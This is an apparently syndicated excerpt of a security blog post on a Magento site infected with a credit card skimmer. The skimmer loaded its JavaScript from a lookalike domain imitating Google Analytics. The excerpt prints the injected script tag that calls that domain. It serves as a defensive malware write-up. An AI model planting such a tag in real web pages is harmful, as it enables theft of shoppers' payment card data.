Fake Google Domains Used in Evasive Magento Skimmer

Fake Google Domains Used in Evasive Magento Skimmer

We were recently contacted by a Magento website owner who had been blacklisted and was experiencing McAfee SiteAdvisor “Dangerous Site” warnings.

Our investigation revealed that the site had been infected with a credit card skimmer loading JavaScript from the malicious internationalized domain google-analytîcs[.]com (or xn--google-analytcs-xpb[.]com in ASCII):

<script type=”text/javascript” src=”//google-analytîcs.com/www.[redacted].com/3f5cf4657d5d9.js”></script>

The malicious user purposely selected the domain name with the intention of deceiving unsuspecting victims.

Continue reading Fake Google Domains Used in Evasive Magento Skimmer at Sucuri Blog.

Read more: Fake Google Domains Used in Evasive Magento Skimmer

Story added 25. July 2019, content source with full text you can find at link above.